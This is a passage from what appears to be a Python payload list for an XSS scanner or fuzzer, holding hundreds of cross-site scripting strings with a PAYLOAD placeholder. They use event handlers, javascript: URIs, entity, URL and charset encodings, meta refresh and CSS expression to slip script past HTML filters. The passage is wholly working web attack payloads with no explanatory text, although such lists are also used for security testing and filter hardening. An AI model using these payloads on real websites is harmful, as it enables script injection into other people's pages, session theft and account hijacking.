          'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><x foo='?><script>javascript:alert(PAYLOAD)</script>'>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<%25 foo><x foo="%25><script>javascript:alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><a href="javascript:%0061lert&#x28;PAYLOAD&#x29;">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><button formaction="javascript:alert(PAYLOAD)">Y</button>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><button formaction=javascript&colon;alert(PAYLOAD)>Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><button formaction=javascript&colon;alert(PAYLOAD)>Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><button formaction="javascript:javascript:alert(PAYLOAD)">X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id=Y /><button form=Y formaction=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id="Y" /><button form="Y" formaction="javascript:alert(PAYLOAD)">X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id="Y" /><button form="Y" formaction="javascript:javascript:alert(PAYLOAD)">X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id="Y"></form><button form="Y" formaction="javascript:alert(PAYLOAD)">X</button>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id=Y onforminput=javascript:alert(PAYLOAD)><input></form><button form=Y onformchange=javascript:alert(PAYLOAD)>X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form id=Y onforminput=prompt(PAYLOAD)><input></form><button form=Y onformchange=prompt(PAYLOAD)>X</button>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(PAYLOAD)"&#11;&#10;&#09;;>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><isindex formaction="javascript&colon;confirm(PAYLOAD)"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form name=self location="javascript&#58;alert(PAYLOAD)"></form><script>if(top!=self){ top.location=self.location}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form name=self location="javascript&#58;alert(PAYLOAD)"></form><script>if(top!=self){top.location=self.location}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form name=self location="javascript:alert(PAYLOAD)"></form><script>if(top!=self){ top.location=self.location}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form name=self location="javascript:alert(PAYLOAD)"></form><script>if(top!=self){top.location=self.location}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><textarea &#13; onkeyup='%0061%006C%0065%0072%0074&#x28;PAYLOAD&#x29;'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<FRAMESET><FRAME SRC="javascript:alert(PAYLOAD);"></FRAMESET>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<FRAMESET><FRAME SRC="javascript:alert('PAYLOAD');"></FRAMESET>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<FRAMESET><FRAME SRC="javascript:javascript:alert(PAYLOAD);"></FRAMESET>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onBlur frameset onBlur="javascript:javascript:alert(PAYLOAD)"></frameset onBlur>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onFocus frameset onFocus="javascript:javascript:alert(PAYLOAD)"></frameset onFocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=javascript:javascript:alert(PAYLOAD)></frameset>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onload=prompt(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onScroll frameset onScroll="javascript:javascript:alert(PAYLOAD)"></frameset onScroll>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''?#?gad=xxxx"onload="alert(PAYLOAD)"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''/#?gad=xxxx"onload="alert(PAYLOAD)"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''#?gad=xxxx"onload="alert(PAYLOAD)"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<head><base href="javascript://"/></head><body><a href="/. /,alert(PAYLOAD)//#">XXX</a></body>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(PAYLOAD)//#">Y</a></body>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(PAYLOAD);+ADw-/SCRIPT+AD4-''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('PAYLOAD');+ADw-/SCRIPT+AD4-''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%25(PAYLOAD)s;+ADw-/SCRIPT+AD4-''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#Zault#time2"><t:set attributeName="innerHTML" to="Y<SCRIPT ZER>javascript:alert(PAYLOAD)</SCRIPT>"></BODY></HTML>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseDown html onMouseDown="javascript:javascript:alert(PAYLOAD)"></html onMouseDown>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(PAYLOAD)"></html onMouseEnter>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseLeave html onMouseLeave="javascript:javascript:alert(PAYLOAD)"></html onMouseLeave>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onmousemove html onmousemove="javascript:javascript:alert(PAYLOAD)"></html onmousemove>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseMove html onMouseMove="javascript:javascript:alert(PAYLOAD)"></html onMouseMove>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseOut html onMouseOut="javascript:javascript:alert(PAYLOAD)"></html onMouseOut>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onmouseover html onmouseover="javascript:javascript:alert(PAYLOAD)"></html onmouseover>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseOver html onMouseOver="javascript:javascript:alert(PAYLOAD)"></html onMouseOver>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseUp html onMouseUp="javascript:javascript:alert(PAYLOAD)"></html onMouseUp>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseWheel html onMouseWheel="javascript:javascript:alert(PAYLOAD)"></html onMouseWheel>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''htmlStr = '<a href="javascript:alert(PAYLOAD)">Y</a>'; document.getElementById('body').innerHTML = htmlStr; try { alert(PAYLOAD);}catch(e){alert(PAYLOAD);};''',
          'browser':"""[Not Info]"""},
    { 'payload':'''htmlStr = '<a href="javascript:alert(PAYLOAD)">Y</a>'; document.getElementById('body').innerHTML = htmlStr; try { if(document.getElementById('body').firstChild.protocol === 'javascript:') { alert(PAYLOAD); } }catch(e){alert(PAYLOAD);};''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<HTML xmlns:Y><?import namespace="Y" implementation="%25(htc)s"><Y:Y>Y</Y:Y></HTML>""","XML namespace."),("""<XML ID="Y"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(PAYLOAD)"></B></I></XML><SPAN DATASRC="#Y" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''http://%22%20onerror=%22alert%28PAYLOAD%29;//''',
          'browser':"""[Not Info]"""},
        { 'payload':'''http://www.<script>alert(PAYLOAD)</script .com''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if gte IE 4]><SCRIPT>alert(PAYLOAD);</SCRIPT><![endif]-->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if gte IE 4]><SCRIPT>javascript:alert(PAYLOAD);</SCRIPT><![endif]-->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if<img src=x onerror=alert(PAYLOAD)//]> -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if<img src=x onerror=javascript:alert(PAYLOAD)//]> -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/%00/ src=javaSCRIPT&colon;alert(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe %00 src="&Tab;javascript:prompt(PAYLOAD)&Tab;"%00>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(PAYLOAD)"></iframe onbeforeload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe "onload=alert(PAYLOAD)></iframe>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/ /onload=alert(PAYLOAD)></iframe>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/ "onload=alert(PAYLOAD)></iframe>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe///////onload=alert(PAYLOAD)></iframe>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onload iframe onload="javascript:javascript:alert(PAYLOAD)"></iframe onload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onLoad iframe onLoad="javascript:javascript:alert(PAYLOAD)"></iframe onLoad>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/onreadystatechange=%0061%006C%0065%0072%0074('%006PAYLOAD') worksinIE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/onreadystatechange=alert(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></iframe onReadyStateChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe srcdoc='<body onload=prompt&lpar;PAYLOAD&rpar;>'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&lt;img&sol;src=&apos;&apos;onerror=javascript:alert(PAYLOAD)&gt;>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(PAYLOAD) /*iframe/src*/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe src iframe src="javascript:javascript:alert(PAYLOAD)"></iframe src>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe src="javascript:alert(PAYLOAD); <''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe src=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IFRAME SRC="javascript:alert(PAYLOAD);"></IFRAME>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IFRAME SRC="javascript:alert('PAYLOAD');"></IFRAME>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IFRAME SRC="javascript:javascript:alert(PAYLOAD);"></IFRAME>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;PAYLOAD&#x29; >''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe/src \/\/onload = prompt(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if]><script>alert(PAYLOAD)</script -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--[if]><script>javascript:alert(PAYLOAD)</script -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<image src=1 href=1 onerror="javascript:alert(PAYLOAD)"></image>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<image src="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %00src=x onerror="alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %00src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img/&#09;&#10;&#11; src=`~` onerror=prompt(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img%10src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %11src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img%11src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %12src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img%13src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img%32src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %34src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %39src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img %47src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img%47src=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img/anyjunk/onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img dynsrc="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG DYNSRC="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG DYNSRC="javascript:alert('PAYLOAD')">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG DYNSRC="javascript:javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG LOWSRC="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG LOWSRC="javascript:alert('PAYLOAD')">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG LOWSRC="javascript:javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%09javascript:alert(PAYLOAD)%09src=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%0Ajavascript:alert(PAYLOAD)%0Asrc=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%0Bjavascript:alert(PAYLOAD)%0Bsrc=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%0Cjavascript:alert(PAYLOAD)%0Csrc=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%0Djavascript:alert(PAYLOAD)%0Dsrc=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%20javascript:alert(PAYLOAD)%20src=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%22javascript:alert(PAYLOAD)%22src=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%27javascript:alert(PAYLOAD)%27src=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"/><img/onerror=%60javascript:alert(PAYLOAD)%60src=xxx:x />''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#0108;ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#0108ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#108;ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#108ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=`alert(PAYLOAD)`src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=”alert(PAYLOAD)”src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''«img onerror=alert(PAYLOAD) src=a»''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<iMg onerror=alert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#x0006c;ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#x006c;ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=a&#x06c;ert(PAYLOAD) src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=MsgBox+PAYLOAD language=vbs src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(PAYLOAD)’)” SRC=A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=”vbs:MsgBox PAYLOAD” src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG ONERROR=”VBS:MSGBOX PAYLOAD” SRC=A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;PAYLOAD&#x29;&#x27;&#x29; src=a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'/><img/onload=alert(PAYLOAD) src=""/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG onmouseover="alert('PAYLOAD')">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=" &#14;  javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<IMG SRC=" &#14;  javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''`"'><img src='#%27 onerror=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src%32=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src%47=x onerror="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=a onerror=alert(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=a onerror=alert(PAYLOAD) %0A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=a onerror=alert(PAYLOAD)%0A>a''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--<img src="--><img src=x onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=”<img src=x”/onerror=alert(PAYLOAD)//”> Jquery: <img/src/onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--<img src="--><img src=x onerror=javascript:alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<![><img src="]><img src=x onerror=javascript:alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src ?Y?\/onerror = alert(PAYLOAD)​​​''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<img src="x:? title=" onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''><img src="x:x" onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src='xx:x><img src=xx:x onerror=alert(PAYLOAD)>'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src='xx:x onerror="alert(PAYLOAD)">'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src='xx:x\ onerror="alert(PAYLOAD)">'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=x:xx onerror="try {execScript('a=PAYLOAD','vbs');alert(PAYLOAD);}catch(e){alert(PAYLOAD);}">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx alt=`/onerror=alert(PAYLOAD)//`>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''`"'><img src=xxx:x onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!--<img src=xxx:x onerror=alert(PAYLOAD)> -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!-- `<img/src=xx:xx onerror=alert(PAYLOAD)//--!>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=`xx:xx`onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx onerror =alert(PAYLOAD);>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx# /onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''--><img src=xxx:x onerror=alert(PAYLOAD)> -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''--><!-- ---> <img src=xxx:x onerror=javascript:alert(PAYLOAD)> -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx onerror=window[['alert']](PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx onerror="&#X61;lert(PAYLOAD);alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img src=xx:xx onerror="x='\',alert(PAYLOAD)//'">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<img type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input autofocus onfocus=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input id='1'><input id=1><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input id=PAYLOAD><input id=PAYLOAD><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input onblur=alert(PAYLOAD) autofocus><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input onblur=javascript:alert(PAYLOAD) autofocus><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input onblur=write(PAYLOAD) autofocus><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input onfocus=javascript:alert(PAYLOAD) autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input onfocus=write(PAYLOAD) autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input/onmouseover="javaSCRIPT&colon;confirm&lpar;PAYLOAD&rpar;"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input type="image" dynsrc="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input type="text" AUTOFOCUS onfocus=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input type="text" value=``<div/onmouseover='alert(PAYLOAD)'>X</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input type="text" value=`` <div/onmouseover='alert(PAYLOAD)'>X</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<input value=<><iframe/src=javascript:confirm(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<isindex action=javascript:alert(PAYLOAD) type=image>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<isindex type=image src=1 onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<isindex type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y%20-%22%3E%3Cscript%3Ealert(PAYLOAD)%3C%2Fscript%3E''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y%20%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`>Y<div style="font-family:'foo;x:expression(alert(PAYLOAD));/*';">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`>Y<div style="font-family:'foo'x:expression(alert(PAYLOAD));/*';">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:expression(alert(PAYLOAD))">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="xexpression(alert(PAYLOAD))">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<Y STYLE="Y:expression(alert(PAYLOAD))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<keygen autofocus onfocus=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<keygen onfocus=javascript:alert(PAYLOAD) autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<LAYER SRC="javascript:alert(PAYLOAD);"></LAYER>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<li style=list-style:url() onerror=alert(PAYLOAD)></li>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onScroll marquee onScroll="javascript:javascript:alert(PAYLOAD)"></marquee onScroll>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onstart='javascript:alert&#x28;PAYLOAD&#x29;'>^__^''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onStart marquee onStart="javascript:javascript:alert(PAYLOAD)"></marquee onStart>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta charset="mac-farsi">¼script¾javascript:alert(PAYLOAD)¼/script¾''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(PAYLOAD)&&;&&<&&/script&&>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(PAYLOAD)&R&UA;&&<&A9&11/script&X&>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta content="&NewLine; PAYLOAD &NewLine;; JAVASCRIPT&colon; alert(PAYLOAD)" http-equiv="refresh"/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="Link" Content="<javascript:alert(PAYLOAD)>; REL=stylesheet">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;alert(PAYLOAD)"/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(PAYLOAD);">​''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<meta http-equiv="refresh" content="0;url=javascript:confirm(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(PAYLOAD)&lt;/SCRIPT&gt;">''',
          'browser':"""[Not Info]"""},
